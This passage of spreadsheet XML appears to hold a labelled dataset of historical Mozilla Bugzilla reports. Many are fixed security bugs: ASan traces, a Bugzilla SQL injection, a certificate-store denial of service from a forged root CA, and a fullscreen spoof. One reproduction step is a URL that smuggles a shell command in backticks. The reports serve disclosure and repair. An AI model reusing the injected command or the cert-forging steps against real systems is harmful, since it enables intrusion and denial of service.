    #2 0x7f04c798d7b8 in ~txVariableMap /home/worker/workspace/build/src/dom/xslt/xslt/txVariableMap.h:42
    #3 0x7f04c798d7b8 in ~nsAutoPtr /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:78
    #4 0x7f04c798d7b8 in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:99
    #5 0x7f04c79c6015 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:701:1
    #6 0x7f04c79cbbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    ...
0x602000334890 is located 0 bytes inside of 8-byte region [0x602000334890,0x602000334898)
freed by thread T0 here:
    #0 0x4b20db in free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f04c798c87f in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7f04c798c87f in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:95
    #3 0x7f04c79c6015 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:701:1
    #4 0x7f04c79cbbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    ...
previously allocated by thread T0 here:
    #0 0x4b23fb in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4df2ad in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f04c79a25ff in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f04c79a25ff in txSetParam::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txInstructions.cpp:761
    #4 0x7f04c79fcaed in txXSLTProcessor::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49:14
    #5 0x7f04c79c5c18 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:676:14
    #6 0x7f04c79cbbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    ...</t>
        </is>
      </c>
      <c r="X5863" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5864">
      <c r="A5864" t="n">
        <v>307185</v>
      </c>
      <c r="B5864" t="inlineStr">
        <is>
          <t>2005-09-06 02:06:11 -0700</t>
        </is>
      </c>
      <c r="C5864" t="inlineStr">
        <is>
          <t>URLs passed on the command line are parsed by the shell (bash).</t>
        </is>
      </c>
      <c r="D5864" t="inlineStr">
        <is>
          <t>2009-05-04 15:28:46 -0700</t>
        </is>
      </c>
      <c r="E5864" t="n">
        <v>1</v>
      </c>
      <c r="F5864" t="n">
        <v>1</v>
      </c>
      <c r="G5864" t="n">
        <v>6</v>
      </c>
      <c r="H5864" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5864" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5864" t="inlineStr">
        <is>
          <t>Cmd-line Features</t>
        </is>
      </c>
      <c r="K5864" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5864" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5864" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5864" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5864" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5864" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5864" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5864" t="n">
        <v>1</v>
      </c>
      <c r="U5864" t="n">
        <v>1</v>
      </c>
      <c r="V5864" t="n">
        <v>26</v>
      </c>
      <c r="W5864" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050719 Galeon/1.3.21
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050720
URLs passed on the command line e.g firefox &lt;url&gt; seem to be fed into the shell
(bash). This makes it pariticularly hard to reliably pass URLs to firefox from
external programs. Mozilla 1.7.10 (1.5.1-FC4) doesn't seem to be affected.
using: firefox-1.0.6-1.1.fc4
Reproducible: Always
Steps to Reproduce:
1. cd /
2. mozilla http://local\`find\`host (works fine, gives DNS error)
3. firefox http://local\`find\`host (executes find!)
Actual Results:  
The URLs backticks were parsed.</t>
        </is>
      </c>
      <c r="X5864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5865">
      <c r="A5865" t="n">
        <v>1228312</v>
      </c>
      <c r="B5865" t="inlineStr">
        <is>
          <t>2015-11-26 05:30:55 -0800</t>
        </is>
      </c>
      <c r="C5865" t="inlineStr">
        <is>
          <t>Replace the TREEHERDER_RABBITMQ_* environment variables with BROKER_URL</t>
        </is>
      </c>
      <c r="D5865" t="inlineStr">
        <is>
          <t>2015-12-21 07:12:23 -0800</t>
        </is>
      </c>
      <c r="E5865" t="n">
        <v>1</v>
      </c>
      <c r="F5865" t="n">
        <v>1</v>
      </c>
      <c r="G5865" t="n">
        <v>7</v>
      </c>
      <c r="H5865" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5865" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5865" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5865" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5865" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5865" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5865" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5865" t="inlineStr"/>
      <c r="Q5865" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5865" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5865" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5865" t="n">
        <v>1</v>
      </c>
      <c r="U5865" t="n">
        <v>0</v>
      </c>
      <c r="V5865" t="n">
        <v>2</v>
      </c>
      <c r="W5865" t="inlineStr">
        <is>
          <t>Created attachment 8692500
Sysadmins diff
When the IT change freeze is over, please can the TREEHERDER_RABBITMQ_* environment variables be replaced with BROKER_URL - I've attached a diff to show the changes. Hopefully it should apply cleanly over the sysadmins puppet repo (I had to futz with paths since I can't check out the whole sysadmins repo at once).
Many thanks :-)</t>
        </is>
      </c>
      <c r="X5865" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5866">
      <c r="A5866" t="n">
        <v>515191</v>
      </c>
      <c r="B5866" t="inlineStr">
        <is>
          <t>2009-09-08 10:35:35 -0700</t>
        </is>
      </c>
      <c r="C5866" t="inlineStr">
        <is>
          <t>[SECURITY] SQL Injection via Bug.search (CVE-2009-3125) and Bug.create (CVE-2009-3165)</t>
        </is>
      </c>
      <c r="D5866" t="inlineStr">
        <is>
          <t>2009-11-17 16:37:03 -0800</t>
        </is>
      </c>
      <c r="E5866" t="n">
        <v>1</v>
      </c>
      <c r="F5866" t="n">
        <v>1</v>
      </c>
      <c r="G5866" t="n">
        <v>4</v>
      </c>
      <c r="H5866" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5866" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5866" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K5866" t="inlineStr">
        <is>
          <t>3.3.2</t>
        </is>
      </c>
      <c r="L5866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5866" t="inlineStr">
        <is>
          <t>click "Hide Obsolete" at the bottom of the attachment list, then pick the patch that closest-matches your version number.</t>
        </is>
      </c>
      <c r="Q5866" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5866" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5866" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T5866" t="n">
        <v>1</v>
      </c>
      <c r="U5866" t="n">
        <v>0</v>
      </c>
      <c r="V5866" t="n">
        <v>77</v>
      </c>
      <c r="W5866" t="inlineStr">
        <is>
          <t>Unfortunately, Bug.search does not validate its parameters to determine that the keys are valid.
The WebService does not taint its incoming parameters.
Bugzilla::Object-&gt;match does not validate its parameters, and will allow arbitrary SQL through in keys.
Interestingly enough, I haven't actually found a way to exploit it in a way that destroys data, due to the way that DBD::mysql and DBD::Pg work--DBD::mysql recognizes ";" as a syntax error, and Pg won't prepare multiple statements. I can't quite find anything harmful to do in a subquery, either.
It also can't violate security restrictions, because we call visible_bugs on the returned result.
However, SQL injections are still a bad, bad thing. Even if *I* can't find a way to exploit this one, I'm sure somebody will.</t>
        </is>
      </c>
      <c r="X5866" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5867">
      <c r="A5867" t="n">
        <v>1035438</v>
      </c>
      <c r="B5867" t="inlineStr">
        <is>
          <t>2014-07-07 14:41:29 -0700</t>
        </is>
      </c>
      <c r="C5867" t="inlineStr">
        <is>
          <t>AddressSanitizer: stack-buffer-overflow with gfxUserFontSet::OTSMessage on the stack</t>
        </is>
      </c>
      <c r="D5867" t="inlineStr">
        <is>
          <t>2020-02-28 03:04:15 -0800</t>
        </is>
      </c>
      <c r="E5867" t="n">
        <v>1</v>
      </c>
      <c r="F5867" t="n">
        <v>1</v>
      </c>
      <c r="G5867" t="n">
        <v>3</v>
      </c>
      <c r="H5867" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5867" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5867" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5867" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5867" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5867" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5867" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5867" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q5867" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5867" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5867" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T5867" t="n">
        <v>1</v>
      </c>
      <c r="U5867" t="n">
        <v>0</v>
      </c>
      <c r="V5867" t="n">
        <v>15</v>
      </c>
      <c r="W5867" t="inlineStr">
        <is>
          <t>Created attachment 8451933
stack
+++ This bug was initially created as a clone of Bug #1030667 +++
+++ This bug was initially created as a clone of Bug #1023758 +++
+++ This bug was initially created as a clone of Bug #1021612 +++
I tested Steven's asan build ( http://people.mozilla.org/~stmichaud/bmo/firefox-asan.dmg ) from Jul 02 (bug 1030667 comment 30) and when I went to http://spectrum.ieee.org/static/interactive-the-top-programming-languages , the asan build crashed with a stack buffer overflow with gfxUserFontSet::OTSMessage on the stack.
Steven Michaud could reproduce this on 10.8.5 and I reproduced this on 10.9.4. He advises that this might be a font issue, so cc'ing John Daggett and Jonathan Kew.
Setting s-s and sec-critical until we know what is going on. Please feel free to re-rate this as necessary. Setting needinfo? from John and Jonathan.</t>
        </is>
      </c>
      <c r="X5867" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5868">
      <c r="A5868" t="n">
        <v>1814597</v>
      </c>
      <c r="B5868" t="inlineStr">
        <is>
          <t>2023-02-02 02:46:06 -0800</t>
        </is>
      </c>
      <c r="C5868" t="inlineStr">
        <is>
          <t>Multiple requestFullScreen repeatedly then launch window with same window name able to overlap fullscreen notification toast</t>
        </is>
      </c>
      <c r="D5868" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:57 -0700</t>
        </is>
      </c>
      <c r="E5868" t="n">
        <v>1</v>
      </c>
      <c r="F5868" t="n">
        <v>1</v>
      </c>
      <c r="G5868" t="n">
        <v>3</v>
      </c>
      <c r="H5868" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5868" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5868" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5868" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5868" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5868" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q5868" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5868" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5868" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T5868" t="n">
        <v>1</v>
      </c>
      <c r="U5868" t="n">
        <v>0</v>
      </c>
      <c r="V5868" t="n">
        <v>21</v>
      </c>
      <c r="W5868" t="inlineStr">
        <is>
          <t>Created attachment 9315560
testcase.html
After launch new popup window then repeatedly call multiple requestFullscreen using setInterval and launch popup window with same windowName interestingly it able to overlap fullscreen notification toast.
I have tested this works on Linux X11 and Wayland.
## Tested on:
- Firefox Nightly 111.0a1 (2023-02-01) (64-bit) on Arch Linux KDE and Ubuntu 22.10
- Firefox 109.0.1 (64-bit) on Arch Linux KDE
## Steps to reproduce
1. Visit attached testcase.html
2. Click "newWindow" button
3. Click "Spoof" button on Main Window
4. Re-click "Spoof" if child window not maximized or browser not goes into full-screen
5. Browser goes into full-screen and overlapped by popup window</t>
        </is>
      </c>
      <c r="X5868" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5869">
      <c r="A5869" t="n">
        <v>249004</v>
      </c>
      <c r="B5869" t="inlineStr">
        <is>
          <t>2004-06-29 02:28:02 -0700</t>
        </is>
      </c>
      <c r="C5869" t="inlineStr">
        <is>
          <t>Importing false CA certificate leading to error -8182 (perm DoS), especially exploitable by email</t>
        </is>
      </c>
      <c r="D5869" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E5869" t="n">
        <v>1</v>
      </c>
      <c r="F5869" t="n">
        <v>1</v>
      </c>
      <c r="G5869" t="n">
        <v>6</v>
      </c>
      <c r="H5869" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5869" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5869" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K5869" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L5869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5869" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5869" t="inlineStr">
        <is>
          <t>[sg:fix]blocking1.4.3+</t>
        </is>
      </c>
      <c r="Q5869" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5869" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5869" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5869" t="n">
        <v>1</v>
      </c>
      <c r="U5869" t="n">
        <v>5</v>
      </c>
      <c r="V5869" t="n">
        <v>116</v>
      </c>
      <c r="W5869" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040608
Importing a self-made certificate (call it x) with the same DN (but different
serial nr) as a built-in CA root cert (called b) overrides the built-in one:
trying to open a SSL page protected by a cert signed by b throws an error -8182
('certificate presented by xyz.com is invalid or corrupt') -&gt; Denial of Service.
This could be automated when importing x via mime type
application/x-x509-email-cert, causing Mozilla to import the cert silently (bug
Nr. 2). 
This is also possible via email messages, calling the cert x link inside an
&lt;iframe&gt; tag, leading to a silent import of x when opening or previewing the
message (bug Nr. 3).
Conclusion: fully automatical DoS of the entire cert store via email is
possible, no user interaction needed. 
Reproducible: Always
Steps to Reproduce:
1. craft a self-signed cert (openssl) with the same DN as a built-in CA root cert.
2. import it into the cert store, either manually or by providing it as pem
encoded using the mime content type application/x-x509-email-cert for _silent
import_.
3. Your certificate store is "corrupted" from this time on: open a web site
protected by an SSL certificate signed by the root CA cert you've been forging
(e.g. https://www.thawte.com/) and you'll get an error -8182. 
4. The same could be reached via email when including an &lt;ifram&gt; pointing to the
certs' location, leading to fully automatical silent import of the cert. 
Send me an email to get a link to a page showing it (passwort needed, for legal
reasons): marboesc@student.ethz.ch
Actual Results:  
Mozilla imports the "forged" root cert  into the "authorities" tab of the cert
manager as an untrusted root. You can identify it by the column "security
device": its stored in the  "software security device" instead of the "Builtin
Object Token". However your certificate store is "corrupted" from this time on:
open a web site protected by an SSL certificate signed by the root CA cert
you've been forging (e.g. https://www.thawte.com/) and you'll get an error -8182. 
Expected Results:  
Mozilla silently (without any warning/message!) imports the root cert into the
"authorities" tab of the cert manager as an untrusted root when serving it as
type application/x-x509-email-cert. According to the principles Visibility and
Clarity for 'safe and secure CA-related UI-Dialogs' proposed in chapter 4.2. of
my diploma thesis, instead of no user-feedback, an adequate treatment of this
situation would be to show the import dialogue.
During my diploma thesis on Rogue CA's possibilities, one part of the work was
to evaluate today's browsing software. 
Contact me: This bug was found as part of my diploma thesis which is still going
on. If you have any suggestions or ideas, contact me at 
marboesc@student.ethz.ch (PGP Key: 0x0AA132A7141D27C8)</t>
        </is>
      </c>
      <c r="X5869" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5870">
      <c r="A5870" t="n">
        <v>813820</v>
      </c>
      <c r="B5870" t="inlineStr">
        <is>
          <t>2012-11-20 17:56:10 -0800</t>
        </is>
      </c>
      <c r="C5870" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.15 Beta 1</t>
        </is>
      </c>
      <c r="D5870" t="inlineStr">
        <is>
          <t>2013-03-03 04:28:24 -0800</t>
        </is>
      </c>
      <c r="E5870" t="n">
        <v>1</v>
      </c>
      <c r="F5870" t="n">
        <v>1</v>
      </c>
      <c r="G5870" t="n">
        <v>2</v>
      </c>
      <c r="H5870" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5870" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5870" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5870" t="inlineStr">
        <is>
          <t>SeaMonkey 2.15 Branch</t>
        </is>
      </c>
      <c r="L5870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5870" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5870" t="inlineStr"/>
      <c r="Q5870" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5870" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5870" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5870" t="n">
        <v>1</v>
      </c>
      <c r="U5870" t="n">
        <v>0</v>
      </c>
      <c r="V5870" t="n">
        <v>2</v>
      </c>
      <c r="W5870" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.15 Beta 1
We expect an actual release on Monday 26th November.</t>
        </is>
      </c>
      <c r="X5870" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5871">
      <c r="A5871" t="n">
        <v>1277213</v>
      </c>
      <c r="B5871" t="inlineStr">
        <is>
          <t>2016-06-01 03:33:33 -0700</t>
        </is>
      </c>
      <c r="C5871" t="inlineStr">
        <is>
          <t>Missing continuation state reset after auth dialog cancellation</t>
        </is>
      </c>
      <c r="D5871" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:01 -0800</t>
        </is>
      </c>
      <c r="E5871" t="n">
        <v>1</v>
      </c>
      <c r="F5871" t="n">
        <v>1</v>
      </c>
      <c r="G5871" t="n">
        <v>3</v>
      </c>
      <c r="H5871" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5871" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5871" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5871" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5871" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5871" t="inlineStr">
        <is>
          <t>hidden while we figure out comment 16/18[fixed by backout of bug 890908][necko-active][adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q5871" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5871" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5871" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5871" t="n">
        <v>1</v>
      </c>
      <c r="U5871" t="n">
        <v>0</v>
      </c>
      <c r="V5871" t="n">
        <v>46</v>
      </c>
      <c r="W5871" t="inlineStr">
        <is>
          <t>Created attachment 8758668
bughunter crash report
Found via bughunter and reproduced on a windows 7 trunk debug build based on m-c tip
Steps to reproduce: 
-&gt;&gt; Load -&gt; http://ib1c.nios.ru/Fresh_1c82_GUO_StAcc_R2_n4b01/1199/ru_RU/messageBox.html?sysver=8.3.7.1917
--&gt; close the auth dialog
--&gt;&gt;
Hit MOZ_CRASH(nsAuthSSPI not thread-safe) at c:/Users/mozilla/debug-builds/mozilla-central/extensions/auth/nsAuthSSPI.cpp:181
#01: nsCOMPtr_base::assign_with_AddRef[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x7d4b80]
#02: nsCOMPtr&lt;nsISupports&gt;::operator=[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x6da6a2]
#03: nsHttpNegotiateAuth::MatchesBaseURI[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xf5c3d4]
#04: nsHttpNegotiateAuth::Release[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xf5cb4e]
#05: nsThread::ProcessNextEvent[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x778459]
#06: NS_ProcessNextEvent[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x7e3cd2]
#07: mozilla::ipc::MessagePumpForNonMainThreads::Run[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dl
#08: MessageLoop::RunInternal[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xf9555d]
#09: MessageLoop::RunHandler[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xf954d2]
#10: MessageLoop::Run[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xf950cd]
#11: nsThread::ThreadFunc[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x7834fa]
#12: _PR_NativeRunThread[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\nss3.dll +0x2fb02b]
#13: _PR_MD_YIELD[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\nss3.dll +0x2e01f9]
#14: crt_at_quick_exit[C:\Windows\system32\ucrtbase.DLL +0x7f794]
#15: BaseThreadInitThunk[C:\Windows\system32\kernel32.dll +0x4ef1c]
#16: RtlInitializeExceptionChain[C:\Windows\SYSTEM32\ntdll.dll +0x63648]
#17: RtlInitializeExceptionChain[C:\Windows\SYSTEM32\ntdll.dll +0x6361b]
[Child 4224] ###!!! ABORT: Aborting on channel error.: file c:/Users/mozilla/debug-builds/mozilla-central/ipc/glue/MessageChanne</t>
        </is>
      </c>
      <c r="X5871" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5872">
      <c r="A5872" t="n">
        <v>1293334</v>
      </c>
      <c r="B5872" t="inlineStr">
        <is>
          <t>2016-08-08 10:16:31 -0700</t>
        </is>
      </c>
      <c r="C5872" t="inlineStr">
        <is>
          <t>Replace unreliable divSpoiler (timing side-channel defense)</t>
        </is>
      </c>
      <c r="D5872" t="inlineStr">
        <is>
          <t>2017-02-09 08:03:32 -0800</t>
        </is>
      </c>
      <c r="E5872" t="n">
        <v>1</v>
      </c>
      <c r="F5872" t="n">
        <v>1</v>
      </c>
      <c r="G5872" t="n">
        <v>3</v>
      </c>
      <c r="H5872" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5872" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5872" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5872" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5872" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5872" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5872" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5872" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q5872" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5872" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5872" t="inlineStr">
        <is>
          <t>3.27</t>
        </is>
      </c>
      <c r="T5872" t="n">
        <v>1</v>
      </c>
      <c r="U5872" t="n">
        <v>0</v>
      </c>
      <c r="V5872" t="n">
        <v>70</v>
      </c>
      <c r="W5872" t="inlineStr">
        <is>
          <t>As agl notes in [0] the divSpoiler hack to avoid CPU optimisation and thus timing side channels isn't working. We have the same code [1] that we should replace with something similar (Barrett reduction sounds like a good choice).
[0] https://github.com/openssl/openssl/pull/1027
[1] http://searchfox.org/nss/source/lib/ssl/ssl3con.c#13102</t>
        </is>
      </c>
      <c r="X5872" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5873">
      <c r="A5873" t="n">
        <v>675942</v>
      </c>
      <c r="B5873" t="inlineStr">
        <is>
          <t>2011-08-02 08:09:22 -0700</t>
        </is>
      </c>
      <c r="C5873" t="inlineStr">
        <is>
          <t>slavealloc should linkify URLs and bug numbers</t>
        </is>
      </c>
      <c r="D5873" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5873" t="n">
        <v>1</v>
      </c>
      <c r="F5873" t="n">
        <v>1</v>
      </c>
      <c r="G5873" t="n">
        <v>5</v>
      </c>
      <c r="H5873" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
